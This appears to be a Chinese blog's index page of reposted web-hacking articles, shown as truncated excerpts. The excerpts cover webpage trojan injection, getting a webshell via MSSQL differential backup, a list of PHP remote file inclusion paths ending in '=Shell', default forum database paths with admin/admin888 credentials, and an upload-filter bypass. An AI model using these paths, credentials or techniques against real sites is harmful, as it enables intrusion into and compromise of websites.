文章收集
IronBamboo
这个作者很懒,什么都没留下…
展开
-
改mdb为asp所带来的灾难
本文作者:SuperHei·Lilo文章性质:原创发布日期:2004-09-16 可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接转载 2007-09-08 15:12:00 · 339 阅读 · 0 评论 -
Windows 2003系统目前最完善最完美的安全权限方案
原文:我在电信局做网管,原来管理过三十多台服务器,从多年积累的经验,写出以下详细的Windows2003服务系统的安全方案,我应用以下方案,安全运行了二年,无黑客有成功入侵的记录,也有黑客入侵成功的在案,但最终还是没有拿到肉鸡的最高管理员身份,只是可以浏览跳转到服务器上所有客户的网站。服务器安全设置 >> IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Wi转载 2007-09-21 22:38:00 · 761 阅读 · 0 评论 -
挂马代码大全
以前好象有人发过,被删了,重新贴上来.方便查找一:框架挂马 二:js文件挂马 首先将以下代码 document.write(""); 保存为xxx.js, 则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀四:body挂马 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHT转载 2007-09-21 22:08:00 · 438 阅读 · 0 评论 -
mssql差异备份获得的webshell的个人体会[转载]
以下文章来源于网络MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少! 差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = c:/ddd.bak;--2.创建表并插曲入数转载 2007-09-21 22:06:00 · 471 阅读 · 0 评论 -
dos的常用命令和批处理示例-可作为shell的练习
批处理文件是无格式的文本文件,现在无盘清理基本都是靠它实现的 因为简单实用下面就是方便大家怎样创建批处理文件的 一简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会转载 2007-09-18 17:52:00 · 961 阅读 · 1 评论 -
URLUnicode表
URLUnicode表(节选,主要是非字母的字符,RFC1738)字符 特殊字符的含义 URL编码 # 用来标志特定的文档位置 %23 % 对特殊字符进行编码 %25 & 分隔不同的变量值对 %26 + 在变量值中表示空格 %2B / 表示目录路径 %2F/ %5C=转载 2007-09-09 00:08:00 · 416 阅读 · 0 评论 -
包含漏洞收集
PHP Attacker,PHP Remote File Injecter v1.0 下面是程序代码index2.php?includes_dir=Shell forums/toplist.php?phpbb_root_path=Shell forum/toplist.php?phpbb_root_path=Shell admin/config_settings.tpl.php?inclu转载 2007-09-08 23:25:00 · 3624 阅读 · 1 评论 -
当网站不允许上传asp cer cdx htr文件时
来源:missskys BLOG 关于web上传的问题,利用stm来上传,还能执行程序,这是一段代码: 当前文件名称: Web服务器的名称和版本: 主机名: 端口: 客户或客户代理IP地址: 客户或客户代理主机名: PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径: 客户端给出附加路径信息: 说保存为stm或者shtml看看,运行如下: HTTP_ACCEPT:image/转载 2007-09-08 23:15:00 · 432 阅读 · 0 评论 -
各种网站程序的默认数据库
默认数据库/data/dvbbs7.mdb备份数据库/databackup/dvbbs7.mdb前台:用户名:admin密 码:admin888 后台:用户名:admin密 码:admin888---------------bbsxp:默认数据库database/bbsxp.mdb_______________LeadBBS默认数据库Data/LeadBBS.mdb用户名: Admin密 码: a转载 2007-09-08 15:37:00 · 446 阅读 · 0 评论 -
系统特性与web安全
本文作者:SuperHei文章性质:原创发布日期:2005-10-18 ==============目录================= 一、WINDOWS系统 windows对..转载 2007-09-08 15:08:00 · 379 阅读 · 0 评论 -
eval(function(p,a,c,k,e,d)加密方式的解密程序
script> a=62; function encode() { var code = document.getElementById(code).value; code = code.replace(/[ ]+/g, ); code = code.replace(//g, "/"); var tmp = code.match(/(w+)/g); tmp.so转载 2008-02-13 14:47:00 · 1430 阅读 · 0 评论